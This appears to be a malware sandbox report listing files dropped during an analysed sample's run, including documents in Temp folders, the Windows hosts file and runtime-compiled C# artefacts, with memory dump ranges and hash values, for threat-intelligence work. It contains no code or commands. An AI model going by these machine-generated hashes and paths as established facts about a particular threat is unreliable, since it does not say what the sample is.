053cf809b774c3677d7be8acf94ec38ba68316aa97d41dae1847548851d609f375a9357dc80cb6665bcf6e5af0551f8d264ebe19e9905195716614b3da1f3f1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\GetNew.docx

Filesize
15KB

MD5
939481a94fa3513c9878376e651fad32

SHA1
18bd4ee553332ab3412b23853934d5763479eb21

SHA256
6160158c905a3a0a1b3c598894024b0a59e54d659535e2c89d1d94e1fd78a65d

SHA512
b9ab18a80b5957c43a4e8bf9329ec5d74239b320f519d2420710dbd9127fbedd9f464ccefa36422ad49fbc516486b46e0ca24a77b7de797affc8417db7bbdff2

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\StepRequest.mp4

Filesize
327KB

MD5
7e8837e99cf80a07c9ecefc8c2f71d44

SHA1
0d320c64221be440163d010bd3a7156812e2e7c2

SHA256
3ee81b80508dd2405135c06fdc3b0af66c36f492a103f59b0c20f39c5f418acc

SHA512
eb57eacef12473650adae50be35b4df53127c640862aa67735222797a3342d0492c26f9d5c42eb0ebd785c977534b20a66240c07366dbc8be3bff73c34e56083

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Desktop\TraceClose.xlsx

Filesize
11KB

MD5
be6ce15452e15558860dd64924944542

SHA1
fbe8f0d429f8a4167a088b207eb62c1a35d32ec0

SHA256
bcf74a89271524fd1ab7c298c0eeb732981e058e60c2c46cb400856c79b2040b

SHA512
a0ac7a9015678c5fa065b6b5285c6413c381a97c9c734b60874741534d49ad7264c25d17d657d7b610b12c0b9685892cfaa4da317e69dd2b1c8eafddced1b5c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\BlockBackup.xlsx

Filesize
12KB

MD5
e20ba99bbaede0b314d65bd00769fb03

SHA1
555a3cec19fe4645e01e1f55002849535e23ee1e

SHA256
074130b89c1b75d4f404a91d23f497cdb690753b9341c1ffd6a8eed619e448ba

SHA512
5b3e8e2eb5337d2bc1abcaf3e4e7e03f8a18cb601cabcab4b017f30a0aa9fb57fc1706e5aa01e5c5c3000fd3836cf0e261b45cbebd82fdcd5d339786e7ac625d

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\EditPush.docx

Filesize
15KB

MD5
d2c371fcce45b05f6506e6632588d3d6

SHA1
58504a104dc07d273cf2d5e64f1c080bb86e9cbb

SHA256
e3401a5dc5a9582dc2c2c992ff56f1ecb3519f32cdce37d7cdbce3b0bd917267

SHA512
4384bd09887d84a8ef55e333b62c23823a1b22fa2e1f4edcc94d60f34d287a54145e1171578fb1ec86f6e7afeb57f8a6cf0cd77066015dd382a1cef85e15cd70

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Documents\SaveShow.docx

Filesize
21KB

MD5
38164f6824c9b4668bc4d775832ec394

SHA1
b30706d98b11fe41e42c14d88ad21408140138cd

SHA256
cda84aa7d1d97cc3d53565521da9b01495ecab3e565eb99c2aea0b8fa00ab0f9

SHA512
98ac63024c96bdf014471cf6edb98f254e64701ff14a6252fb3c386a67cd0c2f7203de6d458dffd71a0356a39495cdcf7b3d2bb4ac350abeedbee18b54592b33

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\BackupFind.3gp2

Filesize
680KB

MD5
6463a777318161fa1f64ac2d2d596d51

SHA1
b1fd7397cfe53a3404a732158a9066a6174d03e9

SHA256
42155e056a6a1d6943004156552f09bd1db6caa10a24b2dc2a401af12cf816df

SHA512
22d3cc2bba71cfbf418ef179d430924decddc88de7958af6af427d7527dc953d4ebcca674f6938e080ddd34b8780b5d45a2838ab23ea4c8fa741b02558ce3820

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\BackupUnpublish.inf

Filesize
425KB

MD5
7f5e7e9e32856ac8f0d3adea6cabe3ee

SHA1
404ab04e7295b8f55ba39fc9f2b2d2b3ac5fd38e

SHA256
b70851c19f19bcb67536a8c03eb00207c8072baa95ba4ee9ea158d23aa8dcb96

SHA512
3998b01c4bfb977a8be22d800cfcbe7575030a9c0c39b7db1bb97a7f2f79f3ce86856a0a2edb8f3fe6a961a9e473520e80899cd03ef805af0c6da1b35b00bbcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\ConfirmTest.png

Filesize
269KB

MD5
4fe7ab7f5431d37e005d7008b6f3d0a0

SHA1
8fc1fb5794c2658e43d085a61e427aab5ef625b6

SHA256
15db8cce5ba7ced871b42e33f04230be3c631b1fb3e8cf3a7902cea9225d0c4f

SHA512
123e58242fe614dac73381180c1b0d804076f5c7d5cf6c663405aa0c192689227e07dc1094f73b07544ea622f71d1806d12a2aa02a5414c5c717a3c08a123f5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\DebugPop.jpg

Filesize
1.0MB

MD5
c7d5ae2824775f0444a3122a20452cdc

SHA1
9d757f919642d9eb10f95d55d90007226e91cea5

SHA256
c96b3d832431bd59a03d3fd27ef577a208fa9a2cd7f56c1591ecfe2284375eda

SHA512
1b12a2912f5505a0be14baf02725471b13ff53f6f9d143535de9c278d8e8bc9fddbb63869603de728f420e326ba377bfe45ad074822e7e6db33f31e187077193

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\PingWait.xls

Filesize
354KB

MD5
d40b79105a45cdeb39b929b9459df532

SHA1
956deebbd018a313ba2db8aa9c5ab86237316a97

SHA256
aed8dc0f4c980c64945a3fd88f97507f39532f364295977878f2fb20373e835c

SHA512
06b2fc4eb7c4208972413146af15b162d6734c240185c5d424b9c4195c32cd0a118f8e72c31deb3b4c9cf46ccd989bfe883222360356342a7066d6c1e00971aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\   \Common Files\Downloads\UseEdit.jpeg

Filesize
382KB

MD5
5992ed9e290de8d2963d2bcd3ce16a62

SHA1
326fe1a42463a9533828ca60ca263bacb2567c3d

SHA256
b64b16b9227a3eadada2a12feb5ff430f968c00f0cb6ec60c1726a65f4286b02

SHA512
866984bdb3e11ba366c889f451265cda379c5efdc50bcedd64eb40e2af00463aeddaf922be2017d69abd9cc7206ce35c4bb237f7694b15dfdcbcd3e7d246dcb9

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
2KB

MD5
f99e42cdd8b2f9f1a3c062fe9cf6e131

SHA1
e32bdcab8da0e3cdafb6e3876763cee002ab7307

SHA256
a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

SHA512
c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jsxkmnrg\CSCD3662564B1D4212A68BEC76F339DEB0.TMP

Filesize
652B

MD5
e3382ce240e2669e600aecea85323c59

SHA1
01ca00f886bfe50efbbb08b57caf91b1f807ff8e

SHA256
23ca98dc6c11a114023901a81988801c69104f4ad068197b0559e32c9ca9a51e

SHA512
76df93347c201f50b2d9e2c503d36154a27cc34957cb367121e3c6e8bcd1cfdab0eb83fc5fea60b797c1acc35a1df898aa026b2f03c55f00846194f9ed09afcb

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jsxkmnrg\jsxkmnrg.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\jsxkmnrg\jsxkmnrg.cmdline

Filesize
607B

MD5
1cf7abe75fcd439b675962bb78698842

SHA1
eb01b839e99fcb66e8a5909f40099cbbffaa7f0a

SHA256
f4a6d7f7e449defb94d2dc3e1dfc39e2bc9a774b7b317efd36fde6b3a4e35e34

SHA512
eff3ad9c29b11498b8188eac671b05f9fb3fcc0e4b0fd5396ab713d2c507033661d0e9bea0289275b1f750f4f1bae4b4cfc40eefadd66aed38bd582db1459c4f

Download Submit
memory/828-31-0x00007FFE99560000-0x00007FFE99585000-memory.dmp

Filesize
148KB

Download
memory/828-64-0x00007FFE95C00000-0x00007FFE95C0D000-memory.dmp

Filesize
52KB

Download
memory/828-85-0x00007FFE957A0000-0x00007FFE957C4000-memory.dmp

Filesize
144KB

Download
memory/828-357-0x00007FFE95BA0000-0x00007FFE95BB4000-memory.dmp

Filesize
80KB

Download
memory/828-78-0x00007FFE959E0000-0x00007FFE95A0D000-memory.dmp

Filesize
180KB

Download
memory/828-79-0x00007FFE95B90000-0x00007FFE95B9D000-memory.dmp

Filesize
52KB

Download
memory/828-358-0x00007FFE95B90000-0x00007FFE95B9D000-memory.dmp

Filesize
52KB

Download
memory/828-76-0x00007FFE95BA0000-0x00007FFE95BB4000-memory.dmp

Filesize
80KB

Download
memory/828-70-0x00007FFE86470000-0x00007FFE86B35000-memory.dmp

Filesize
6.8MB

Download
memory/828-71-0x00007FFE99560000-0x00007FFE99585000-memory.dmp

Filesize
148KB

Download
memory/828-72-0x00007FFE95650000-0x00007FFE9571E000-memory.dmp

Filesize
824KB

Download
memory/828-291-0x00007FFE95BC0000-0x00007FFE95BF3000-memory.dmp

Filesize
204KB

Download
memory/828-74-0x00007FFE85C00000-0x00007FFE86133000-memory.dmp

Filesize
5.2MB

Download
memory/828-73-0x000001EAF6760000-0x000001EAF6C93000-memory.dmp

Filesize
5.2MB

Download
memory/828-62-0x00007FFE95C10000-0x00007FFE95C29000-memory.dmp

Filesize
100KB

Download
memory/828-25-0x00007FFE86470000-0x00007FFE86B35000-memory.dmp

Filesize
6.8MB

Download
memory/828-66-0x00007FFE95BC0000-0x00007FFE95BF3000-memory.dmp

Filesize
204KB

Download
memory/828-60-0x00007FFE95280000-0x00007FFE953FF000-memory.dmp

Filesize
1.5MB

Download
memory/828-58-0x00007FFE957A0000-0x00007FFE957C4000-memory.dmp

Filesize
144KB

Download
memory/828-56-0x00007FFE9BA30000-0x00007FFE9BA4A000-memory.dmp

Filesize
104KB

Download
memory/828-54-0x00007FFE959E0000-0x00007FFE95A0D000-memory.dmp

Filesize
180KB

Download
memory/828-183-0x00007FFE95280000-0x00007FFE953FF000-memory.dmp

Filesize
1.5MB

Download
memory/828-84-0x00007FFE85AE0000-0x00007FFE85BFA000-memory.dmp

Filesize
1.1MB

Download
memory/828-48-0x00007FFE9E370000-0x00007FFE9E37F000-memory.dmp

Filesize
60KB

Download
memory/828-363-0x00007FFE9BA30000-0x00007FFE9BA4A000-memory.dmp

Filesize
104KB

Download
memory/828-307-0x000001EAF6760000-0x000001EAF6C93000-memory.dmp

Filesize
5.2MB

Download
memory/828-309-0x00007FFE85C00000-0x00007FFE86133000-memory.dmp

Filesize
5.2MB

Download
memory/828-334-0x00007FFE85AE0000-0x00007FFE85BFA000-memory.dmp

Filesize
1.1MB

Download
memory/828-326-0x00007FFE95280000-0x00007FFE953FF000-memory.dmp

Filesize
1.5MB

Download
memory/828-320-0x00007FFE86470000-0x00007FFE86B35000-memory.dmp

Filesize
6.8MB

Download
memory/828-321-0x00007FFE99560000-0x00007FFE99585000-memory.dmp

Filesize
148KB

Download
memory/828-346-0x00007FFE99560000-0x00007FFE99585000-memory.dmp

Filesize
148KB

Download
memory/828-368-0x00007FFE95BC0000-0x00007FFE95BF3000-memory.dmp

Filesize
204KB

Download
memory/828-369-0x00007FFE95650000-0x00007FFE9571E000-memory.dmp

Filesize
824KB

Download
memory/828-367-0x00007FFE95C00000-0x00007FFE95C0D000-memory.dmp

Filesize
52KB

Download
memory/828-366-0x00007FFE95C10000-0x00007FFE95C29000-memory.dmp

Filesize
100KB

Download
memory/828-365-0x00007FFE95280000-0x00007FFE953FF000-memory.dmp

Filesize
1.5MB

Download
memory/828-364-0x00007FFE957A0000-0x00007FFE957C4000-memory.dmp

Filesize
144KB

Download
memory/828-306-0x00007FFE95650000-0x00007FFE9571E000-memory.dmp

Filesize
824KB

Download
memory/828-362-0x00007FFE959E0000-0x00007FFE95A0D000-memory.dmp

Filesize
180KB

Download
memory/828-361-0x00007FFE9E370000-0x00007FFE9E37F000-memory.dmp

Filesize
60KB

Download
memory/828-360-0x00007FFE85C00000-0x00007FFE86133000-memory.dmp

Filesize
5.2MB

Download
memory/828-345-0x00007FFE86470000-0x00007FFE86B35000-memory.dmp

Filesize
6.8MB

Download
memory/828-359-0x00007FFE85AE0000-0x00007FFE85BFA000-memory.dmp

Filesize
1.1MB

Download
memory/1564-146-0x0000021E1D2D0000-0x0000021E1D2F2000-memory.dmp

Filesize
136KB

Download
memory/4104-212-0x0000026965C90000-0x0000026965C98000-memory.dmp

Filesize
32KB

Download